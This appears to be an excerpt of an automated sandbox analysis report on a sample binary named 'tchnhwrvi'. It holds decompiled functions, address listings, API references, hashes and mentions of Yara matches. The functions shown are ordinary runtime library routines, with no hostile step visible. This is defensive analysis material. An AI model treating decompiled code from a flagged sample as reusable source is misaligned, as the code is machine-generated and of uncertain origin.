                    • String ID: csm$csm$csm
                    • API String ID: 2751267872-393685449
                    • Opcode ID: d2805ed157ee1a0de980ebf95ce551697e3ac2d298d2a0e6c6e08f639c5bac21
                    • Instruction ID: eb951dfd93c377336a0bd22ac6a7177933b6abc1ee62d3cbfcc6e570eabf6f1d
                    • Opcode Fuzzy Hash: d2805ed157ee1a0de980ebf95ce551697e3ac2d298d2a0e6c6e08f639c5bac21
                    • Instruction Fuzzy Hash: 00B17A75900209DFCF15DFA5C9819AEBBB8BF04316F14416BE8017B292C379EA51CF99
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00402310 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 122COMMON
                    Download Yara Rule
                    C-Code - Quality: 53%
                    			E00402310(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				signed int _v32;
				signed char _v36;
				void* _v40;
				signed int _t77;
				signed int _t84;
				intOrPtr _t85;
				void* _t86;
				intOrPtr* _t87;
				intOrPtr _t89;
				signed int _t91;
				int _t93;
				signed int _t98;
				intOrPtr* _t102;
				intOrPtr _t103;
				signed int _t107;
				char _t109;
				signed int _t113;
				void* _t114;
				intOrPtr _t123;
				void* _t125;
				intOrPtr _t133;
				signed int _t135;
				void* _t139;
				void* _t141;
				void* _t149;

				_t118 = __edx;
				_t102 = _a4;
				_push(__edi);
				_v5 = 0;
				_v16 = 1;
				 *_t102 = E0040D360(__ecx,  *_t102);
				_t103 = _a8;
				_t6 = _t103 + 0x10; // 0x11
				_t133 = _t6;
				_push(_t133);
				_v20 = _t133;
				_v12 =  *(_t103 + 8) ^  *0x415010;
				E004022D0(_t103, __edx, __edi, _t133,  *(_t103 + 8) ^  *0x415010);
				E00402967(_a12);
				_t77 = _a4;
				_t141 = _t139 - 0x1c + 0x10;
				_t123 =  *((intOrPtr*)(_t103 + 0xc));
				if(( *(_t77 + 4) & 0x00000066) != 0) {
					__eflags = _t123 - 0xfffffffe;
					if(_t123 != 0xfffffffe) {
						_t118 = 0xfffffffe;
						E00402950(_t103, 0xfffffffe, _t133, 0x415010);
						goto L13;
					}
					goto L14;
				} else {
					_v32 = _t77;
					_v28 = _a12;
					 *((intOrPtr*)(_t103 - 4)) =  &_v32;
					if(_t123 == 0xfffffffe) {
						L14:
						return _v16;
					} else {
						do {
							_t107 = _v12;
							_t84 = _t123 + (_t123 + 2) * 2;
							_t103 =  *((intOrPtr*)(_t107 + _t84 * 4));
							_t85 = _t107 + _t84 * 4;
							_t108 =  *((intOrPtr*)(_t85 + 4));
							_v24 = _t85;
							if( *((intOrPtr*)(_t85 + 4)) == 0) {
								_t109 = _v5;
								goto L7;
							} else {
								_t118 = _t133;
								_t86 = E004028F0(_t108, _t133);
								_t109 = 1;
								_v5 = 1;
								_t149 = _t86;
								if(_t149 < 0) {
									_v16 = 0;
									L13:
									_push(_t133);
									E004022D0(_t103, _t118, _t123, _t133, _v12);
									goto L14;
								} else {
									if(_t149 > 0) {
										_t87 = _a4;
										__eflags =  *_t87 - 0xe06d7363;
										if( *_t87 == 0xe06d7363) {
											__eflags =  *0x40e1c4;
											if(__eflags != 0) {
												_t98 = E0040D1F0(__eflags, "<&@");
												_t141 = _t141 + 4;
												__eflags = _t98;
												if(_t98 != 0) {
													_t135 =  *0x40e1c4; // 0x40263c
													 *0x40e160(_a4, 1);
													 *_t135();
													_t133 = _v20;
													_t141 = _t141 + 8;
												}
												_t87 = _a4;
											}
										}
										_t119 = _t87;
										E00402930(_t87, _a8, _t87);
										_t89 = _a8;
										__eflags =  *((intOrPtr*)(_t89 + 0xc)) - _t123;
										if( *((intOrPtr*)(_t89 + 0xc)) != _t123) {
											_t119 = _t123;
											E00402950(_t89, _t123, _t133, 0x415010);
											_t89 = _a8;
										}
										_push(_t133);
										 *((intOrPtr*)(_t89 + 0xc)) = _t103;
										E004022D0(_t103, _t119, _t123, _t133, _v12);
										E00402910();
										asm("int3");
										asm("int3");
										asm("int3");
										_t113 = _v32;
										_t91 = _v36 & 0x000000ff;
										_t125 = _v40;
										__eflags = _t113;
										if(_t113 == 0) {
											L46:
											return _v40;
										} else {
											_t93 = _t91 * 0x1010101;
											__eflags = _t113 - 0x20;
											if(_t113 <= 0x20) {
												L39:
												__eflags = _t113 & 0x00000003;
												while((_t113 & 0x00000003) != 0) {
													 *_t125 = _t93;
													_t125 = _t125 + 1;
													_t113 = _t113 - 1;
													__eflags = _t113 & 0x00000003;
												}
												__eflags = _t113 & 0x00000004;
												if((_t113 & 0x00000004) != 0) {
													 *_t125 = _t93;
													_t125 = _t125 + 4;
													_t113 = _t113 - 4;
													__eflags = _t113;
												}
												__eflags = _t113 & 0xfffffff8;
												while((_t113 & 0xfffffff8) != 0) {
													 *_t125 = _t93;
													 *(_t125 + 4) = _t93;
													_t125 = _t125 + 8;
													_t113 = _t113 - 8;
													__eflags = _t113 & 0xfffffff8;
												}
												goto L46;
											} else {
												__eflags = _t113 - 0x80;
												if(__eflags < 0) {
													L33:
													asm("bt dword [0x415030], 0x1");
													if(__eflags >= 0) {
														goto L39;
													} else {
														asm("movd xmm0, eax");
														asm("pshufd xmm0, xmm0, 0x0");
														goto L35;
													}
												} else {
													asm("bt dword [0x415c68], 0x1");
													if(__eflags >= 0) {
														asm("bt dword [0x415030], 0x1");
														if(__eflags >= 0) {
															goto L39;
														} else {
															asm("movd xmm0, eax");
															asm("pshufd xmm0, xmm0, 0x0");
															_t114 = _t125 + _t113;
															asm("movups [edi], xmm0");
															_t125 = _t125 + 0x00000010 & 0xfffffff0;
															_t113 = _t114 - _t125;
															__eflags = _t113 - 0x80;
															if(__eflags <= 0) {
																goto L33;
															} else {
																do {
																	asm("movdqa [edi], xmm0");
																	asm("movdqa [edi+0x10], xmm0");
																	asm("movdqa [edi+0x20], xmm0");
																	asm("movdqa [edi+0x30], xmm0");
																	asm("movdqa [edi+0x40], xmm0");
																	asm("movdqa [edi+0x50], xmm0");
																	asm("movdqa [edi+0x60], xmm0");
																	asm("movdqa [edi+0x70], xmm0");
																	_t125 = _t125 + 0x80;
																	_t113 = _t113 - 0x80;
																	__eflags = _t113 & 0xffffff00;
																} while ((_t113 & 0xffffff00) != 0);
																L35:
																__eflags = _t113 - 0x20;
																if(_t113 < 0x20) {
																	L38:
																	asm("movdqu [edi], xmm0");
																	asm("movdqu [edi+0x10], xmm0");
																	return _v40;
																} else {
																	do {
																		asm("movdqu [edi], xmm0");
																		asm("movdqu [edi+0x10], xmm0");
																		_t125 = _t125 + 0x20;
																		_t113 = _t113 - 0x20;
																		__eflags = _t113 - 0x20;
																	} while (_t113 >= 0x20);
																	__eflags = _t113 & 0x0000001f;
																	if((_t113 & 0x0000001f) == 0) {
																		goto L46;
																	} else {
																		goto L38;
																	}
																}
															}
														}
													} else {
														memset(_t125, _t93, _t113 << 0);
														return _v40;
													}
												}
											}
										}
									} else {
										goto L7;
									}
								}
							}
							goto L47;
							L7:
							_t123 = _t103;
						} while (_t103 != 0xfffffffe);
						if(_t109 != 0) {
							goto L13;
						}
						goto L14;
					}
				}
				L47:
			}


































                    0x00402310
                    0x00402317
                    0x0040231b
                    0x0040231c
                    0x00402322
                    0x0040232e
                    0x00402330
                    0x00402336
                    0x00402336
                    0x0040233f
                    0x00402341
                    0x00402344
                    0x00402347
                    0x0040234f
                    0x00402354
                    0x00402357
                    0x0040235a
                    0x00402361
                    0x004023bd
                    0x004023c0
                    0x004023c8
                    0x004023cf
                    0x00000000
                    0x004023cf
                    0x00000000
                    0x00402363
                    0x00402363
                    0x00402369
                    0x0040236f
                    0x00402375
                    0x004023e0
                    0x004023e9
                    0x00402377
                    0x00402377
                    0x00402377
                    0x0040237d
                    0x00402380
                    0x00402383
                    0x00402386
                    0x00402389
                    0x0040238e
                    0x004023a4
                    0x00000000
                    0x00402390
                    0x00402390
                    0x00402392
                    0x00402397
                    0x00402399
                    0x0040239c
                    0x0040239e
                    0x004023b4
                    0x004023d4
                    0x004023d4
                    0x004023d8
                    0x00000000
                    0x004023a0
                    0x004023a0
                    0x004023ea
                    0x004023ed
                    0x004023f3
                    0x004023f5
                    0x004023fc
                    0x00402403
                    0x00402408
                    0x0040240b
                    0x0040240d
                    0x0040240f
                    0x0040241c
                    0x00402422
                    0x00402424
                    0x00402427
                    0x00402427
                    0x0040242a
                    0x0040242a
                    0x004023fc
                    0x00402430
                    0x00402432
                    0x00402437
                    0x0040243a
                    0x0040243d
                    0x00402445
                    0x00402449
                    0x0040244e
                    0x0040244e
                    0x00402451
                    0x00402455
                    0x00402458
                    0x00402468
                    0x0040246d
                    0x0040246e
                    0x0040246f
                    0x00402470
                    0x00402474
                    0x0040247b
                    0x0040247f
                    0x00402481
                    0x004025c3
                    0x004025c9
                    0x00402487
                    0x00402487
                    0x0040248d
                    0x00402490
                    0x00402575
                    0x00402575
                    0x0040257b
                    0x0040257d
                    0x0040257f
                    0x00402580
                    0x00402583
                    0x00402583
                    0x0040258b
                    0x00402591
                    0x00402593
                    0x00402595
                    0x00402598
                    0x00402598
                    0x00402598
                    0x0040259b
                    0x004025a1
                    0x004025b0
                    0x004025b2
                    0x004025b5
                    0x004025b8
                    0x004025bb
                    0x004025bb
                    0x00000000
                    0x00402496
                    0x00402496
                    0x0040249c
                    0x0040252d
                    0x0040252d
                    0x00402535
                    0x00000000
                    0x00402537
                    0x00402537
                    0x0040253b
                    0x00000000
                    0x0040253b
                    0x004024a2
                    0x004024a2
                    0x004024aa
                    0x004024b5
                    0x004024bd
                    0x00000000
                    0x004024c3
                    0x004024c3
                    0x004024c7
                    0x004024cc
                    0x004024ce
                    0x004024d4
                    0x004024d7
                    0x004024d9
                    0x004024df
                    0x00000000
                    0x004024f0
                    0x004024f0
                    0x004024f0
                    0x004024f4
                    0x004024f9
                    0x004024fe
                    0x00402503
                    0x00402508
                    0x0040250d
                    0x00402512
                    0x00402517
                    0x0040251d
                    0x00402523
                    0x00402523
                    0x00402540
                    0x00402540
                    0x00402543
                    0x00402561
                    0x00402565
                    0x00402569
                    0x00402574
                    0x00402545
                    0x00402545
                    0x00402545
                    0x00402549
                    0x0040254e
                    0x00402551
                    0x00402554
                    0x00402554
                    0x00402559
                    0x0040255f
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0040255f
                    0x00402543
                    0x004024df
                    0x004024ac
                    0x004024ac
                    0x004024b4
                    0x004024b4
                    0x004024aa
                    0x0040249c
                    0x00402490
                    0x004023a2
                    0x00000000
                    0x004023a2
                    0x004023a0
                    0x0040239e
                    0x00000000
                    0x004023a7
                    0x004023a7
                    0x004023a9
                    0x004023b0
                    0x00000000
                    0x004023b2
                    0x00000000
                    0x004023b0
                    0x00402375
                    0x00000000

                    APIs
                    • _ValidateLocalCookies.LIBCMT ref: 00402347
                    • ___except_validate_context_record.LIBVCRUNTIME ref: 0040234F
                    • _ValidateLocalCookies.LIBCMT ref: 004023D8
                    • __IsNonwritableInCurrentImage.LIBCMT ref: 00402403
                    • _ValidateLocalCookies.LIBCMT ref: 00402458
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.564427693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_tchnhwrvi.jbxd
                    Yara matches
                    Similarity
                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                    • String ID: <&@$csm
                    • API String ID: 1170836740-4289465445
                    • Opcode ID: 62bc818260f3d61d15a3a2816a247d7c989dff70b0980e5c6bc77aebcd7fc6d4
                    • Instruction ID: e86dbd8585806dd5d23d3718c6f18d027200fadb66ce12341b0a8af8e769dc64
                    • Opcode Fuzzy Hash: 62bc818260f3d61d15a3a2816a247d7c989dff70b0980e5c6bc77aebcd7fc6d4
                    • Instruction Fuzzy Hash: EF41D734A002199BCF10DF69C988A9EBBB0AF44314F14807AED14BB3D2D7B9DA55CB95
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00282E75 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 160COMMONLIBRARYCODE
                    Download Yara Rule
                    C-Code - Quality: 97%
                    			E00282E75(char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
				signed int _v8;
				char* _v12;
				signed int _v16;
				signed int _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t82;
				char _t89;
				signed int _t96;
				signed int _t98;
				signed int _t101;
				signed int _t104;
				signed int _t108;
				signed int _t109;
				char* _t110;
				signed int _t120;
				signed int _t123;
				signed int _t124;
				signed int _t125;
				signed int _t126;
				void* _t127;

				_t110 = _a4;
				_t108 = _a8;
				_t123 = _a12;
				_v12 = _t110;
				_v8 = _t108;
				if(_t123 == 0 || _a16 == 0) {
					L5:
					return 0;
				} else {
					_t131 = _t110;
					if(_t110 != 0) {
						_t126 = _a20;
						__eflags = _t126;
						if(_t126 == 0) {
							L9:
							__eflags = _t108 - 0xffffffff;
							if(_t108 != 0xffffffff) {
								_t82 = E00285760(_t110, 0, _t108);
								_t127 = _t127 + 0xc;
							}
							__eflags = _t126;
							if(__eflags == 0) {
								goto L3;
							} else {
								__eflags = _a16 - (_t82 | 0xffffffff) / _t123;
								if(__eflags > 0) {
									goto L3;
								}
								L13:
								_t124 = _t123 * _a16;
								__eflags =  *(_t126 + 0xc) & 0x0000010c;
								_v20 = _t124;
								_t109 = _t124;
								if(( *(_t126 + 0xc) & 0x0000010c) == 0) {
									_v16 = 0x1000;
								} else {
									_v16 =  *((intOrPtr*)(_t126 + 0x18));
								}
								__eflags = _t124;
								if(_t124 == 0) {
									L40:
									return _a16;
								} else {
									do {
										__eflags =  *(_t126 + 0xc) & 0x0000010c;
										if(( *(_t126 + 0xc) & 0x0000010c) == 0) {
											L24:
											__eflags = _t109 - _v16;
											if(_t109 < _v16) {
												_t89 = E00284EE9(_t109, _t124, _t126);
												__eflags = _t89 - 0xffffffff;
												if(_t89 == 0xffffffff) {
													L45:
													return (_t124 - _t109) / _a12;
												}
												__eflags = _v8;
												if(_v8 == 0) {
													L41:
													__eflags = _a8 - 0xffffffff;
													if(__eflags != 0) {
														E00285760(_a4, 0, _a8);
													}
													 *((intOrPtr*)(E00283CF8(__eflags))) = 0x22;
													L4:
													E00283CA6();
													goto L5;
												}
												_v12 = _v12 + 1;
												 *_v12 = _t89;
												_t109 = _t109 - 1;
												_t65 =  &_v8;
												 *_t65 = _v8 - 1;
												__eflags =  *_t65;
												_v16 =  *((intOrPtr*)(_t126 + 0x18));
												goto L39;
											}
											__eflags = _v16;
											if(_v16 == 0) {
												_t96 = 0x7fffffff;
												__eflags = _t109 - 0x7fffffff;
												if(_t109 <= 0x7fffffff) {
													_t96 = _t109;
												}
											} else {
												__eflags = _t109 - 0x7fffffff;
												if(_t109 <= 0x7fffffff) {
													_t50 = _t109 % _v16;
													__eflags = _t50;
													_t120 = _t50;
													_t101 = _t109;
												} else {
													_t120 = 0x7fffffff % _v16;
													_t101 = 0x7fffffff;
												}
												_t96 = _t101 - _t120;
											}
											__eflags = _t96 - _v8;
											if(_t96 > _v8) {
												goto L41;
											} else {
												_push(_t96);
												_push(_v12);
												_push(E002856B8(_t126));
												_t98 = E002855C2(_t109, _t124, _t126, __eflags);
												_t127 = _t127 + 0xc;
												__eflags = _t98;
												if(_t98 == 0) {
													 *(_t126 + 0xc) =  *(_t126 + 0xc) | 0x00000010;
													goto L45;
												}
												__eflags = _t98 - 0xffffffff;
												if(_t98 == 0xffffffff) {
													L44:
													_t72 = _t126 + 0xc;
													 *_t72 =  *(_t126 + 0xc) | 0x00000020;
													__eflags =  *_t72;
													goto L45;
												}
												_v12 = _v12 + _t98;
												_t109 = _t109 - _t98;
												_v8 = _v8 - _t98;
												goto L39;
											}
										}
										_t104 =  *(_t126 + 4);
										__eflags = _t104;
										if(__eflags == 0) {
											goto L24;
										}
										if(__eflags < 0) {
											goto L44;
										}
										_t125 = _t109;
										__eflags = _t109 - _t104;
										if(_t109 >= _t104) {
											_t125 = _t104;
										}
										__eflags = _t125 - _v8;
										if(_t125 > _v8) {
											goto L41;
										} else {
											E002856DE(_v12, _v8,  *_t126, _t125);
											 *(_t126 + 4) =  *(_t126 + 4) - _t125;
											 *_t126 =  *_t126 + _t125;
											_v12 = _v12 + _t125;
											_t109 = _t109 - _t125;
											_t127 = _t127 + 0x10;
											_v8 = _v8 - _t125;
											_t124 = _v20;
										}
										L39:
										__eflags = _t109;
									} while (_t109 != 0);
									goto L40;
								}
							}
						}
						_t82 = (_t82 | 0xffffffff) / _t123;
						__eflags = _a16 - _t82;
						if(_a16 <= _t82) {
							goto L13;
						}
						goto L9;
					}
					L3:
					 *((intOrPtr*)(E00283CF8(_t131))) = 0x16;
					goto L4;
				}
			}


























                    0x00282e7d
                    0x00282e81
                    0x00282e86
                    0x00282e89
                    0x00282e8c
                    0x00282e91
                    0x00282ead
                    0x00000000
                    0x00282e99
                    0x00282e99
                    0x00282e9b
                    0x00282eb4
                    0x00282eb7
                    0x00282eb9
                    0x00282ec7
                    0x00282ec7
                    0x00282eca
                    0x00282ed0
                    0x00282ed5
                    0x00282ed5
                    0x00282ed8
                    0x00282eda
                    0x00000000
                    0x00282edc
                    0x00282ee3
                    0x00282ee6
                    0x00000000
                    0x00000000
                    0x00282ee8
                    0x00282ee8
                    0x00282eec
                    0x00282ef3
                    0x00282ef6
                    0x00282ef8
                    0x00282f02
                    0x00282efa
                    0x00282efd
                    0x00282efd
                    0x00282f09
                    0x00282f0b
                    0x00282feb
                    0x00000000
                    0x00282f11
                    0x00282f11
                    0x00282f11
                    0x00282f18
                    0x00282f5e
                    0x00282f5e
                    0x00282f61
                    0x00282fc0
                    0x00282fc6
                    0x00282fc9
                    0x0028301d
                    0x00000000
                    0x00283023
                    0x00282fcb
                    0x00282fcf
                    0x00282ff3
                    0x00282ff3
                    0x00282ff7
                    0x00283001
                    0x00283006
                    0x0028300e
                    0x00282ea8
                    0x00282ea8
                    0x00000000
                    0x00282ea8
                    0x00282fd4
                    0x00282fd7
                    0x00282fdc
                    0x00282fdd
                    0x00282fdd
                    0x00282fdd
                    0x00282fe0
                    0x00000000
                    0x00282fe0
                    0x00282f63
                    0x00282f67
                    0x00282f88
                    0x00282f8d
                    0x00282f8f
                    0x00282f91
                    0x00282f91
                    0x00282f69
                    0x00282f70
                    0x00282f72
                    0x00282f7f
                    0x00282f7f
                    0x00282f7f
                    0x00282f82
                    0x00282f74
                    0x00282f76
                    0x00282f79
                    0x00282f79
                    0x00282f84
                    0x00282f84
                    0x00282f93
                    0x00282f96
                    0x00000000
                    0x00282f98
                    0x00282f98
                    0x00282f99
                    0x00282fa3
                    0x00282fa4
                    0x00282fa9
                    0x00282fac
                    0x00282fae
                    0x0028302b
                    0x00000000
                    0x0028302b
                    0x00282fb0
                    0x00282fb3
                    0x00283019
                    0x00283019
                    0x00283019
                    0x00283019
                    0x00000000
                    0x00283019
                    0x00282fb5
                    0x00282fb8
                    0x00282fba
                    0x00000000
                    0x00282fba
                    0x00282f96
                    0x00282f1a
                    0x00282f1d
                    0x00282f1f
                    0x00000000
                    0x00000000
                    0x00282f21
                    0x00000000
                    0x00000000
                    0x00282f27
                    0x00282f29
                    0x00282f2b
                    0x00282f2d
                    0x00282f2d
                    0x00282f2f
                    0x00282f32
                    0x00000000
                    0x00282f38
                    0x00282f41
                    0x00282f46
                    0x00282f49
                    0x00282f4b
                    0x00282f4e
                    0x00282f50
                    0x00282f53
                    0x00282f56
                    0x00282f56
                    0x00282fe3
                    0x00282fe3
                    0x00282fe3
                    0x00000000
                    0x00282f11
                    0x00282f0b
                    0x00282eda
                    0x00282ec0
                    0x00282ec2
                    0x00282ec5
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00282ec5
                    0x00282e9d
                    0x00282ea2
                    0x00000000
                    0x00282ea2

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.564345946.0000000000281000.00000020.00000001.01000000.00000004.sdmp, Offset: 00280000, based on PE: true
                    • Associated: 00000002.00000002.564331157.0000000000280000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000002.00000002.564382776.0000000000290000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000002.00000002.564399761.0000000000294000.00000008.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000002.00000002.564416353.0000000000299000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_280000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: _memset$__filbuf__getptd_noexit__read_memcpy_s
                    • String ID: L)(
                    • API String ID: 4048096073-4147288743
                    • Opcode ID: e1879961a99f507c14c04207bb93430f685d5d6a89d1b6176f8fdab3d4404e37
                    • Instruction ID: 62d10751acd7e7c80dc3ffb0d9d343e068a95c7503e4b14380295952314333a9
                    • Opcode Fuzzy Hash: e1879961a99f507c14c04207bb93430f685d5d6a89d1b6176f8fdab3d4404e37
                    • Instruction Fuzzy Hash: 9851E739A22206DFCB24FFA9C84465EB7B5AF50320F248629F825A65D0D7709E78DF50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004082D3 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E004082D3(void* __ecx, signed int* _a4, intOrPtr _a8) {
				signed int _v8;
				void* _t20;
				void* _t22;
				WCHAR* _t26;
				signed int _t29;
				void** _t30;
				signed int* _t35;
				void* _t38;
				void* _t40;

				_t35 = _a4;
				while(_t35 != _a8) {
					_t29 =  *_t35;
					_v8 = _t29;
					_t38 =  *(0x416300 + _t29 * 4);
					if(_t38 == 0) {
						_t26 =  *(0x40fa88 + _t29 * 4);
						_t38 = LoadLibraryExW(_t26, 0, 0x800);
						if(_t38 != 0) {
							L14:
							_t30 = 0x416300 + _v8 * 4;
							 *_t30 = _t38;
							if( *_t30 != 0) {
								FreeLibrary(_t38);
							}
							L16:
							_t20 = _t38;
							L13:
							return _t20;
						}
						_t22 = GetLastError();
						if(_t22 != 0x57) {
							L9:
							 *(0x416300 + _v8 * 4) = _t22 | 0xffffffff;
							L10:
							_t35 =  &(_t35[1]);
							continue;
						}
						_t22 = E00405A18(_t26, L"api-ms-", 7);
						_t40 = _t40 + 0xc;
						if(_t22 == 0) {
							goto L9;
						}
						_t22 = E00405A18(_t26, L"ext-ms-", 7);
						_t40 = _t40 + 0xc;
						if(_t22 == 0) {
							goto L9;
						}
						_t22 = LoadLibraryExW(_t26, _t38, _t38);
						_t38 = _t22;
						if(_t38 != 0) {
							goto L14;
						}
						goto L9;
					}
					if(_t38 != 0xffffffff) {
						goto L16;
					}
					goto L10;
				}
				_t20 = 0;
				goto L13;
			}












                    0x004082dc
                    0x00408371
                    0x004082e4
                    0x004082e6
                    0x004082f0
                    0x004082f5
                    0x00408302
                    0x00408317
                    0x0040831b
                    0x00408381
                    0x00408386
                    0x0040838d
                    0x00408391
                    0x00408394
                    0x00408394
                    0x0040839a
                    0x0040839a
                    0x0040837c
                    0x00408380
                    0x00408380
                    0x0040831d
                    0x00408326
                    0x0040835f
                    0x0040836c
                    0x0040836e
                    0x0040836e
                    0x00000000
                    0x0040836e
                    0x00408330
                    0x00408335
                    0x0040833a
                    0x00000000
                    0x00000000
                    0x00408344
                    0x00408349
                    0x0040834e
                    0x00000000
                    0x00000000
                    0x00408353
                    0x00408359
                    0x0040835d
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0040835d
                    0x004082fa
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00408300
                    0x0040837a
                    0x00000000

                    APIs
                    • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,B51C3102,?,004083E2,00000002,00000000,00000000), ref: 00408394
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.564427693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_tchnhwrvi.jbxd
                    Yara matches
                    Similarity
                    • API ID: FreeLibrary
                    • String ID: api-ms-$ext-ms-
                    • API String ID: 3664257935-537541572
                    • Opcode ID: c9283d596dd430a65ff98e794139049b5b5b47e480c88dd665e719789acae378
                    • Instruction ID: 573f1ada4d3828c880b6c39e4f7b2ce1dfde6baafd70aff868d57e190d54574b
                    • Opcode Fuzzy Hash: c9283d596dd430a65ff98e794139049b5b5b47e480c88dd665e719789acae378
                    • Instruction Fuzzy Hash: F1212B32A00221EBC7219B229D40A9F3368EB81B60F25053AED55B73D0DF79ED01CADD
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00281160 Relevance: 10.6, APIs: 7, Instructions: 66windowCOMMON
                    Download Yara Rule
                    C-Code - Quality: 84%
                    			E00281160() {
				struct tagRECT _v20;
				struct tagRECT _v36;
				signed int _t10;
				int _t21;
				int _t34;
				intOrPtr _t35;

				_t10 = 0 |  *0x2970f8 == 0x00000000;
				 *0x2970f8 = _t10;
				asm("sbb eax, eax");
				CheckMenuItem(GetMenu( *0x2970e4), 0x205,  ~_t10 & 0x00000008);
				GetClientRect( *0x2970e4,  &_v20);
				asm("sbb eax, eax");
				ShowWindow( *0x2970f4,  ~( *0x2970f8) & 0x00000005);
				_t35 = _v20.bottom;
				_t34 = _v20.right;
				_t21 = 0;
				if( *0x2970f8 != 0) {
					SendMessageW( *0x2970f4, 5, 0, 0);
					GetWindowRect( *0x2970f4,  &_v36);
					_t21 = _v36.bottom - _v36.top;
				}
				SetWindowPos( *0x2970ec, 0, 0, 0, _t34, _t35 - _t21, 0x204);
				return E00281090();
			}









                    0x0028116f
                    0x00281173
                    0x0028117a
                    0x00281192
                    0x002811a3
                    0x002811b6
                    0x002811bd
                    0x002811c3
                    0x002811c6
                    0x002811c9
                    0x002811d1
                    0x002811de
                    0x002811ef
                    0x002811f8
                    0x002811f8
                    0x00281211
                    0x00281221

                    APIs
                    • GetMenu.USER32(?), ref: 0028118B
                    • CheckMenuItem.USER32(00000000), ref: 00281192
                    • GetClientRect.USER32 ref: 002811A3
                    • ShowWindow.USER32(?,?), ref: 002811BD
                    • SendMessageW.USER32(?,00000005,00000000,00000000), ref: 002811DE
                    • GetWindowRect.USER32 ref: 002811EF
                    • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000204), ref: 00281211
                    Memory Dump Source
                    • Source File: 00000002.00000002.564345946.0000000000281000.00000020.00000001.01000000.00000004.sdmp, Offset: 00280000, based on PE: true
                    • Associated: 00000002.00000002.564331157.0000000000280000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000002.00000002.564382776.0000000000290000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000002.00000002.564399761.0000000000294000.00000008.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000002.00000002.564416353.0000000000299000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_280000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: Window$MenuRect$CheckClientItemMessageSendShow
                    • String ID:
                    • API String ID: 1873219884-0
                    • Opcode ID: 5e2dae1d591911e2bda0c7fe2bbc35a4e4642905c10af0262a8f2b52d905c589
                    • Instruction ID: d298f31800ca825345a110d533cc6ed42ef43913a9f12aa33c3243670af063dc
                    • Opcode Fuzzy Hash: 5e2dae1d591911e2bda0c7fe2bbc35a4e4642905c10af0262a8f2b52d905c589
                    • Instruction Fuzzy Hash: 0211607566421AAFD710DB74FD8EEBB37BCEB48701F104527FA19D3290E634A8408B64
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004029C1 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                    Download Yara Rule
                    C-Code - Quality: 82%
                    			E004029C1(void* __ecx) {
				void* _t8;
				void* _t11;
				void* _t13;
				void* _t14;
				void* _t18;
				void* _t23;
				long _t24;
				void* _t27;

				_t13 = __ecx;
				if( *0x415040 != 0xffffffff) {
					_t24 = GetLastError();
					_t11 = E00402CA4(_t13,  *0x415040);
					_t14 = _t23;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						if(_t11 == 0) {
							if(E00402CDF(_t14,  *0x415040, 0xffffffff) != 0) {
								_push(0x28);
								_t27 = E004057DE();
								_t18 = 1;
								if(_t27 == 0) {
									L8:
									_t11 = 0;
									E00402CDF(_t18,  *0x415040, 0);
								} else {
									_t8 = E00402CDF(_t18,  *0x415040, _t27);
									_pop(_t18);
									if(_t8 != 0) {
										_t11 = _t27;
										_t27 = 0;
									} else {
										goto L8;
									}
								}
								E0040571A(_t27);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t24);
					return _t11;
				} else {
					return 0;
				}
			}











                    0x004029c1
                    0x004029c8
                    0x004029db
                    0x004029e2
                    0x004029e4
                    0x004029e8
                    0x00402a01
                    0x00402a01
                    0x004029ea
                    0x004029ec
                    0x004029ff
                    0x00402a06
                    0x00402a0f
                    0x00402a12
                    0x00402a15
                    0x00402a29
                    0x00402a29
                    0x00402a32
                    0x00402a17
                    0x00402a1e
                    0x00402a24
                    0x00402a27
                    0x00402a3b
                    0x00402a3d
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00402a27
                    0x00402a40
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004029ff
                    0x004029ec
                    0x00402a48
                    0x00402a52
                    0x004029ca
                    0x004029cc
